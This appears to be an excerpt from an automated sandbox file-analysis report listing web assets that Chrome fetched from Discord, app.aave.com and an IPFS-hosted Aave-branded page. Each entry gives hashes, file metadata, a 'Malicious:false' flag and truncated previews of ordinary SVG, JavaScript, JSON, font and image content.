                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M21.87-1.413H-2.167v16.826H21.87V-1.413Z" fill="#C60B1E"/><path d="M21.87 2.794H-2.167v8.413H21.87V2.793Z" fill="#FFC400"/><path d="M3.217 6.064s-.016 0-.025-.006a.38.38 0 0 1-.036-.034l-.022-.017-.02-.03s-.022-.04-.013-.071c.01-.03.029-.04.045-.05.016-.01.052-.021.052-.021s.028-.013.036-.013a.428.428 0 0 1 .041-.01s.01-.007.02-.011c.01-.004.022-.004.029-.006.006-.004.026-.007.035-.01l.052.003.052.004.07-.004c.013 0 .023-.004.036 0l.048.013.068.027c.016.007.058.013.074.021.02.01.029.023.039.038.01.013.01.027.012.037a.065.065 0 0 1 0 .038c-.004.01-.016.027-.016.027l-.02.034-.026.02s-.02.017-.032.017-.16-.03-.257-.03a1.179 1.179 0 0 0-.242.034Z" fill="#AD1519"/><path d="M3.72 6.072c-.003 0-.003 0 0 0-.005 0-.012-.004-.025-.004-.048-.007-.157-.028-.23-.028-.091 0-.232.028-.244.03-.004 0-.02 0-.026-.006a.29.29 0 0 1-.038-.034l-.023-.017-.02-.03c0-.004-.025-.044-.012-.074.013-.033.032-.044.048-.054a.266.266 0 0
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3822
                                                                                                                                                                                                                                                  Entropy (8bit):4.757556018267729
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:T0LsZkU7aWjMjPQdmyFCUbin6Cdq+WPUqWWuuXe0xIA/zAH9EwJH9EwTw:ssZkUsLByFCUenxkDUcXe0xIA/zAfa
                                                                                                                                                                                                                                                  MD5:256D5A202BC91FE137E22BFD4247E5B6
                                                                                                                                                                                                                                                  SHA1:EE972371F540E36D35F7874AC9328D09019745F2
                                                                                                                                                                                                                                                  SHA-256:7EBD23435F1E5EC4330A3951E7B9A34D8C60E959EEC9E98B2F1C989E1AC92646
                                                                                                                                                                                                                                                  SHA-512:E77F5E1184CCAD104ADEC314E57F9FBE03B940542A82F9783FDB571B185238D9D64182C06BF1BE1604E6E85CE5792483C8E90C75F168BFD21F394EEC1FA0E21A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="36" height="36" viewBox="0 0 36 36" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)"><path d="M18 36c9.941 0 18-8.059 18-18S27.941 0 18 0 0 8.059 0 18s8.059 18 18 18Z" fill="#fff"/><path d="M17.973 36V10.06c-2.178-.008-3.937-.6-3.937-1.33 0-.542.974-1.01 2.37-1.216a8.16 8.16 0 0 0 1.608.153 8.205 8.205 0 0 0 1.573-.145l.036-.008c1.396.207 2.37.674 2.37 1.216 0 .723-1.728 1.312-3.88 1.33V36h-.14ZM14.83 6.337c0-.47.912-.869 2.176-1.01a6.479 6.479 0 0 0 1.981.006l.033-.006c1.264.141 2.176.54 2.176 1.01 0 .587-1.425 1.063-3.183 1.063-1.758 0-3.183-.476-3.183-1.063Zm.796-1.941c0-.44 1.068-.797 2.387-.797 1.318 0 2.387.357 2.387.797 0 .44-1.07.798-2.387.798-1.319 0-2.387-.358-2.387-.798Zm2.345-.872V.01h.141v3.514h-.14Z" fill="#000"/><path d="M17.995 36a17.898 17.898 0 0 1-10.061-3.073 18.048 18.048 0 0 1-6.52-7.917 17.905 17.905 0 0 1-1.048-3.378 18.17 18.17 0 0 1 0-7.254 17.897 17.897 0 0 1 2.707-6.434 18.048 18.048 0 0 1 7.918-6.52A17
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):113
                                                                                                                                                                                                                                                  Entropy (8bit):4.460750616283363
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YGKjl8jwDEYRrajpHV+wJ6ARORzACDEYkayjY6v:YGKjDRrajpHV9LorMcE
                                                                                                                                                                                                                                                  MD5:30B15D37E2F2C6C09F35BCC56B64571A
                                                                                                                                                                                                                                                  SHA1:A5566ADA13410C39A4059BEC0FF59D51316D89CD
                                                                                                                                                                                                                                                  SHA-256:BE58D93E5BC2C48B3FB9C87BD7140109630195E84CCE67701FCCABCF5256BFE0
                                                                                                                                                                                                                                                  SHA-512:EE8E8192B3120D7A2FC9DCE3585D87FAAF689B2E03046C8B7F533FE3CBA408BF0E8614CA2AACD6ED21A206B4B461ECA507D5B38D01839CA9AC5B93971D1F7B10
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/api/v9/auth/location-metadata
                                                                                                                                                                                                                                                  Preview:{"consent_required":false,"country_code":"US","promotional_email_opt_in":{"required":false,"pre_checked":false}}.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):980278
                                                                                                                                                                                                                                                  Entropy (8bit):5.846645230901696
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:Qb57+cb0NGl3c/e46gPI6f0+PoUkMQXEERestk2GqGZ14SdeKuUAAr+ReOhdJJu6:+h+c2GlceaIuHEY1BeKd+zJuUtATkS7u
                                                                                                                                                                                                                                                  MD5:75EAB8DD83B9F39C97B15917D1787D02
                                                                                                                                                                                                                                                  SHA1:102B660D7E3ABC958BB844C1D5D9C664CA551EAC
                                                                                                                                                                                                                                                  SHA-256:3FB5D129D6830524A7AD34581D1CCCC4A1102DBDE75C1BEBE40F80CBC852E12E
                                                                                                                                                                                                                                                  SHA-512:F25BC2B326F1CD7E58635CA9C5C62BF5D711964F16B0FF3118E00BC5ADF86DE1E59DA3B774776C588E7B299D9EA1BC75639E0B1F34C42130E698EBB9E92479B2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/sentry.4aa65d81f09c738c28ce.js
                                                                                                                                                                                                                                                  Preview:(()=>{var e={654861:function(e,t,r){e=r.nmd(e);var n=function(e){"use strict";var t=c(9007199254740992),r="0123456789abcdefghijklmnopqrstuvwxyz",a="function"==typeof BigInt;function o(e,t,r,n){return void 0===e?o[0]:void 0!==t?10!=+t||r?K(e,t,r,n):W(e):W(e)}function i(e,t){this.value=e,this.sign=t,this.isSmall=!1}function _(e){this.value=e,this.sign=e<0,this.isSmall=!0}function E(e){this.value=e}function s(e){return -9007199254740992<e&&e<9007199254740992}function c(e){return e<1e7?[e]:e<1e14?[e%1e7,Math.floor(e/1e7)]:[e%1e7,Math.floor(e/1e7)%1e7,Math.floor(e/1e14)]}function I(e){u(e);var r=e.length;if(r<4&&0>g(e,t))switch(r){case 0:return 0;case 1:return e[0];case 2:return e[0]+1e7*e[1];default:return e[0]+(e[1]+1e7*e[2])*1e7}return e}function u(e){for(var t=e.length;0===e[--t];);e.length=t+1}function l(e){for(var t=Array(e),r=-1;++r<e;)t[r]=0;return t}function R(e){return e>0?Math.floor(e):Math.ceil(e)}function A(e,t){var r,n,a=e.length,o=t.length,i=Array(a),_=0;for(n=0;n<o;n++)_=(r=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (21082), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):21082
                                                                                                                                                                                                                                                  Entropy (8bit):5.322146231915684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:zAZ0ga+5iem20B250eu0WQh9XpKUafieOmst:M0gaH20p/Qh9Xmf4t
                                                                                                                                                                                                                                                  MD5:A78FD337016215B4967246086EF0A1A1
                                                                                                                                                                                                                                                  SHA1:FE696508202BCA0042BA413CFC86BB02E61791C7
                                                                                                                                                                                                                                                  SHA-256:0B27542BF49F42594B53261D65312DCB0AFBCAA320398E13A053CCFBBF7CC472
                                                                                                                                                                                                                                                  SHA-512:A03BBFA5283D93BB7E56205B0B8BBEE1F562E85F24D28C208502D21BDA2E43E1A9603728A9D6DEA533B221A17A43EA7D5A2F7D82BB31E40FA1D3EECEA92E6D85
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3e3],{15446:function(e,t,r){"use strict";r.d(t,{O:function(){return i}});var n=r(30120),o=r(64288),a=r(85893),i=function(e){var t=e.children;return(0,a.jsx)(n.Z,{sx:{display:"flex",flexDirection:"column",flex:1,mt:{xs:"-32px",lg:"-46px",xl:"-44px",xxl:"-48px"}},children:(0,a.jsx)(o.Z,{children:t})})}},40535:function(e,t,r){"use strict";r.d(t,{V:function(){return h}});var n=r(49501),o=r(62097),a=r(61225),i=r(30120),s=r(29630),c=r(75084),u=r(78371),p=r(67728),l=r(25563),d=r(68861),f=r(85893),h=function(e){var t=e.pageTitle,r=e.withMarketSwitcher,h=e.withMigrateButton,x=(0,u.Y)((function(e){return(0,p.lY)(e)})),b=(0,o.Z)(),m=(0,a.Z)(b.breakpoints.up("lg")),v=(0,a.Z)(b.breakpoints.down("xsm"));return(0,f.jsxs)(i.Z,{sx:{display:"flex",alignItems:{xs:"flex-start",xsm:"center"},mb:t?4:0,flexDirection:{xs:"column",xsm:"row"}},children:[t&&(v||!r)&&(0,f.jsx)(i.Z,{sx:{display:"flex",alignItems:"flex-start"},children:(0,f.jsx)(s.Z,{variant:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9309)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9358
                                                                                                                                                                                                                                                  Entropy (8bit):5.630138877286959
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:fcLtSa9QY4Cg9OHfMp1tOxyoZA0abcKPqO2Lk2mMATwJDxnE7LoH:6WCQyfMLteyoZA0abcKPqO2Lp+wJDxEg
                                                                                                                                                                                                                                                  MD5:339EFF57636A4A9033F4B2D6C2EC64CD
                                                                                                                                                                                                                                                  SHA1:BA1227A68F5F148A100744EAF4EDD3DD101529C7
                                                                                                                                                                                                                                                  SHA-256:461EC7B3D2270EA876CD375CF1BD201BB08C05FD0B96BBC2091E71A546FD440B
                                                                                                                                                                                                                                                  SHA-512:15207A31BBE6BB20EFEED8D3870ED51219FB3B255F6977026A52A6DF05EDBED10C23D3F90BAF2299E412AF7828D8206BEFD93644868729E57F365387140A2F03
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["4775"],{292824:function(t){t.exports="/assets/00fe8a6557e204eb9503.svg"},231239:function(t,e,n){var r=n(990547),i=n(283693),l=n(570140),u=n(573261),o=n(981631);e.Z={signup:(t,e)=>u.Z.post({url:o.ANM.HUB_WAITLIST_SIGNUP,body:{email:t,school:e},trackedActionData:{event:r.NetworkActionNames.HUB_WAITLIST_SIGNUP,properties:t=>{var e;let n=!1,r=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.email_domain;return null!=r&&(n=-1!==r.split(".").indexOf("edu")),(0,i.iG)({is_edu_email:n})}}}),sendVerificationEmail:async(t,e,n)=>(await u.Z.post({url:o.ANM.HUB_EMAIL_VERIFY_SEND,body:{email:t,guild_id:n,allow_multiple_guilds:e,use_verification_code:!0},trackedActionData:{event:r.NetworkActionNames.HUB_EMAIL_VERIFY_SEND,properties:t=>{var e;let n=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.has_matching_guild;return(0,i.iG)({has_matching_guild:n})}}})).body,async verify(t){if(null!=t)try{var e;let n=awa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (40091), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40091
                                                                                                                                                                                                                                                  Entropy (8bit):5.484135629228316
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:iKMmrRhCsKj+v2ZJ26HRQKiKpSrFkSTDKIv84h5:fRhCB+vWHFiXySTDKW8Y
                                                                                                                                                                                                                                                  MD5:6150BD14D567B050D48974E4BDAF2CCC
                                                                                                                                                                                                                                                  SHA1:0847A13C2755655F74D3D5770946DF3EC746CFA9
                                                                                                                                                                                                                                                  SHA-256:8B303BF90BD9BA561D01E253F1D65A74276BEDAB400B29DE736BD79959E21464
                                                                                                                                                                                                                                                  SHA-512:03A2E91A41DEAF775565949819C782845FDA785C74795D7A0C885F6163FE00376E078CE8AC2EDF3D67616657DDDEA550E824B2894A894EB6BCCC5E94A30B03C3
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4423],{50020:function(e,r,t){var n=t(59499),o=t(4730),a=t(91655),i=t(30120),s=t(29630),l=(t(67294),t(46839)),c=t(41024),u=t(85893),d=["minVal","maxVal","percentVariant","hyphenVariant"];function p(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function x(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?p(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):p(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}r.Z=function(e){var r=e.minVal,t=e.maxVal,n=e.percentVariant,p=e.hyphenVariant,m=(0,o.Z)(e,d),b=(0,l.HT)(),v=b.ghoLoadingData,h=b.ghoReserveData;if(v)return(0,u.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):67673
                                                                                                                                                                                                                                                  Entropy (8bit):5.380705915445072
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:Z2nuwfFn9AO/DH386xQo2PlP7WaC0SCsoPxmK:QuwfFn9AO46xQo2PlP7WaC0SCsoJmK
                                                                                                                                                                                                                                                  MD5:8706CE35CA06F56D4260E987342A59C6
                                                                                                                                                                                                                                                  SHA1:2294CC22BCDBD3BBD7A2B1B6CF3298D9AA06B119
                                                                                                                                                                                                                                                  SHA-256:4879C167942D8A64527F16DDDE298DD8E722D3F439F75E82138293A32FC38C1B
                                                                                                                                                                                                                                                  SHA-512:A6578863DE7E07C35FF06DF75D34A00067D2A0F9A29B01F6524F182EA4E722A42E6FDB8C845DD3174595E983E62E087254282D4F405897599074AF2836238325
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/staking/
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="initial-scale=1, width=device-width"/><title>Aave - Open Source Liquidity Protocol</title><meta name="description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:title" content="Aave - Open Source Liquidity Protocol"/><meta property="og:description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:image" content="https://app.aave.com/aave-com-opengraph.png"/><meta name="twitter:image" content="https://app.aave.com/aave-com-opengraph.png"/><meta name="
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 39424, version 2.66
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):39424
                                                                                                                                                                                                                                                  Entropy (8bit):7.995696618521677
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:768:RtWd6RsrMjeX+oUMPzo4niAVyynUFTyEatQHzV2h2TzpLJD5JoswdZB:/y6RsbDRzookyncNMQHzAALRovL
                                                                                                                                                                                                                                                  MD5:7F63813838E283AEA62F1A68EF1732C2
                                                                                                                                                                                                                                                  SHA1:C855806CB7C3CC1D29546E3E6446732197E25E93
                                                                                                                                                                                                                                                  SHA-256:440AD8B1449985479BC37265E9912BBF2BF56FE9FFD14709358A8E9C2D5F8E5B
                                                                                                                                                                                                                                                  SHA-512:AAEA9683EB6C4A24107FC0576EB68E9002ADB0C58D3B2C88B3F78D833EB24CECDD9FF5C20DABE7438506A44913870A1254416E2C86EC9ACBBCC545BF40EA6D48
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/ecff74bf4394e6e58dd1.woff2
                                                                                                                                                                                                                                                  Preview:wOF2..............|`.......B..........................Z.. .`..P..B..W.....,..U.6.$..`..r.. ..n..F..5[.V...n.<..j.......n....G...T...asj...nV..W........L6.0...U+.....5.M3gx..j.Ic.&..- ...<"....r..N(B..0..2`..(TI0|.N..n`..W..b....|.gX....={...S\*..C...J...._.*RY..dR...\.>.Z...yG.F.9.i...vn..!F.U....1.-u.....Z.S...k....0|..2.$D..<L..E.....H.p.....]..Lu.......t.2..Mq.B.+..r}.....&XBU/...T."..?U'T.2....|J]...!....C2e.\I..PQ-+s..*...5..G.?b.,`. )....s..A........)..z.".U.=....".M..m...c...HQs..Q...]..bE...8..d8.C233..p..l.&"C../%2R......s.$..@....1....J]U.....w..G0.....l..X......L.......z...)rD../...r.LC.T.$A. .. A.Y!.6...It....jG.t..*w./...y.X..;......~_..[...^9'.B...#..Ol.....f....F.b....g?...x.-.....i.-Kx...U.k.JG..6.q:..1.a....?....f......m.....K3...4=UK....t...o..s.Dm.9.n./.._K..JSM...T...3.H........6"3...w..>.Kb.g..............F@..E.R.+%<G..U.|6.....(S..MRt...zy.O..#P..........X.t.uj...s....#z..F...X..U.5.cT).Q...Y....pa.z.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):305049
                                                                                                                                                                                                                                                  Entropy (8bit):5.5963044393655315
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:ETwUYzK1DV+CdvpsWKEOv87EsZqyPB7W3vZNvuddjCjM7+MsesjZvhiQg9zsVamm:aOwvNOTspdESu3K6uIB2FaDQsEdC2ql4
                                                                                                                                                                                                                                                  MD5:60AD25CE593386660A4E400BB95137C0
                                                                                                                                                                                                                                                  SHA1:5D483ACD3766DFFAAB3691FAFE733ABEC3C6A82A
                                                                                                                                                                                                                                                  SHA-256:7866AB134C1E6125947D2E29C107554584BB2DA571B9A52FB720A57987C50E3A
                                                                                                                                                                                                                                                  SHA-512:255927A871B0A4FD4CF059B2AEAE155366F47E09822B1956F1EBC617CE4B1DE2F5B8D58F8E8260900B5F6F37DC4F029A8F9C30B6B76586ADF6070CD3EE36464A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/8806.676baa0645cae697.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8806],{8403:function(e,s,o){"use strict";o.d(s,{M:function(){return x}});var a=o(59499),n=o(53737),d=o(33740),t=o(62097),c=o(61225),i=o(30120),r=o(81011),m=o(80562),b=o(23279),l=o.n(b),g=o(67294),A=o(85893);function f(e,s){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);s&&(a=a.filter((function(s){return Object.getOwnPropertyDescriptor(e,s).enumerable}))),o.push.apply(o,a)}return o}var x=function(e){var s=e.onSearchTermChange,o=e.wrapperSx,b=e.placeholder,x=e.disableFocus,h=(0,g.useRef)(null),C=(0,g.useState)(""),D=C[0],F=C[1],E=(0,t.Z)().breakpoints,I=(0,c.Z)(E.down("sm")),p=(0,g.useMemo)((function(){return l()((function(e){s(e)}),300)}),[s]);return(0,A.jsxs)(i.Z,{sx:function(e){return function(e){for(var s=1;s<arguments.length;s++){var o=null!=arguments[s]?arguments[s]:{};s%2?f(Object(o),!0).forEach((function(s){(0,a.Z)(e,s,o[s])})):Object.getOwnPropertyDescriptors?Object.defineProper
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x870, components 3
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):27722
                                                                                                                                                                                                                                                  Entropy (8bit):5.832908095467153
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:LGWKaOOlN9NVYqK5uj8N9HnsJoD0WDwBnC4SS4V0EkoJ8whr6wSbZNm9952UKQa:qZoNG48XHVD3DKnCEk6a8FZE9dKQa
                                                                                                                                                                                                                                                  MD5:706626DC94A67F26D258B4BB09FE9BCD
                                                                                                                                                                                                                                                  SHA1:E005D88D202410D848AF817EE9971F8659F03D90
                                                                                                                                                                                                                                                  SHA-256:3D152CAB7A5748D4BF246F49B4066C9288B294EF0DCF8BCC588FECCD803FE7AF
                                                                                                                                                                                                                                                  SHA-512:8AE38F07ED05D7DD26D0216C3704B737E02D444CFA1B90C853CCCE9534BC7B3C58E14CA0884423A022EBA0609A07A3C44BAB99D4B0719AE9228B8359F53B1550
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://cdn.discordapp.com/splashes/602826299974877205/26d834daa945e775d8af2935a04f83e7.jpg?size=1280
                                                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......f...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...hVz.....H.(.%..#w$...V..W.F**.c...).QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..V^...x.N...%/..R.....jQJQRV{.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                  Entropy (8bit):5.602109857496208
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:XJp70f+qYRe9bYPNL9cQ7Hd77GDNEOI7KL8ME9q:XJpTFRe5YPNLj7yREerE
                                                                                                                                                                                                                                                  MD5:77AAE561D0D3B45D1837EAC14665B410
                                                                                                                                                                                                                                                  SHA1:73F80F03D47B7A8A89007AC14DA0D11BC5180421
                                                                                                                                                                                                                                                  SHA-256:23B36858DBEB7F1A985849BDA8186DB9EDF70114EE7FBA7CFD6CC8CFFE8DF555
                                                                                                                                                                                                                                                  SHA-512:8D4BABFF7AD8FF3B8B687EB6F4B7145363343694756EC517F9836E66411C3FB1C10A61293C6AA2E1F80EF5AFB0F66F66B9C9DA0C285E9CBED6366E43A87C7BDA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/favicon.ico
                                                                                                                                                                                                                                                  Preview:............ .h.......(....... ..... ..........................3..6..;...?...D...G...L...P...U...X...]...a...f...i...n...r..6..;..]..V...G...L...P...T...X...]...a...e...r......r...v..;...?...........L...P...U...X...]...a...f...i..............~z...?...C.........i...T...X...]...a...e...i...t..........~z..{....D...G..v..........X...]...a...f...i...n............{...x....G...L...P...........a...a...e...i...n...r..........~...w...u....L...P...U.............f...i...n...r..............x...u...q....P...T..r....................r...v..............u...q...n....U...X..........................z..............u...q...n...j....X...]...e....................~z............q...n...j...g....]...a...f...i...n...........}..{...........t...n...j...h...d....a...e...i...n...r........................n...j...g...d...a....f...i...n...r...w..........................j...h...d...a...]....i...n...r...v..~z..{...................j...g...d...a...]...Z....n...r...w..~z..{...x...................h
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):2978
                                                                                                                                                                                                                                                  Entropy (8bit):4.663799526528363
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:+2d0/YxPWpKUz0V4X9wMWd4XHZbSd06fWLWdH8gGLWP:+oxPWYdg2MWdgHYdlfaWl8gqM
                                                                                                                                                                                                                                                  MD5:EEA03772EFC06A350F82C9392F239BAC
                                                                                                                                                                                                                                                  SHA1:B71FA591B8AB4DEBB69D7119D2EFD96508D83D77
                                                                                                                                                                                                                                                  SHA-256:957755DC5613E30463D0018F158EB50B70C2901CF1051E01BB67F9EC6B662194
                                                                                                                                                                                                                                                  SHA-512:A32E3DAF88F7D228EF64EE45C8903E6EBE711469626ABBC51461C97E0E6AB9E7B3202352853E02019DF9016972982F1EFB967E7D7644E1DAF5E71A986154A052
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/aaveLogo.svg
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="71.989" height="20" data-name="Group 13859"><defs><linearGradient id="a" x1="-1.999" x2="1.962" y1="1.034" y2=".112" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#30bac6"/><stop offset="1" stop-color="#b6509e"/></linearGradient><linearGradient id="b" x1="-4.048" x2="1.181" y1="1.315" y2=".379" xlink:href="#a"/><linearGradient id="c" x1="-1.123" x2="2.834" y1=".926" y2=".004" xlink:href="#a"/><linearGradient id="d" x1="-.051" x2="3.906" y1=".677" y2="-.246" xlink:href="#a"/></defs><g data-name="Group 10477"><g data-name="Aave Logo Colored"><g data-name="Group 4051"><path fill="url(#a)" d="m227.16 18.7-6.974-16.918a1.487 1.487 0 0 1-.086-.48 1.326 1.326 0 0 1 .343-.943 1.2 1.2 0 0 1 .925-.36 1.25 1.25 0 0 1 .72.24 1.526 1.526 0 0 1 .5.634l6.632 16.555L235.848.874a1.525 1.525 0 0 1 .5-.634 1.25 1.25 0 0 1 .72-.24 1.2 1.2 0 0 1 .925.36 1.326 1.326 0 0 1 .343.943 1.487 1.487 0 0 1-.08
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5533), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5533
                                                                                                                                                                                                                                                  Entropy (8bit):5.482858083538453
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:AAP9jlOEIqZx6ry2aib/Ez/nSuUwVedoAPX1B8NWFTmveHV5Pf3VIB6P42H4E4mc:AAPfIJsibc/nSekd5tB8oFpHnf3eBwgb
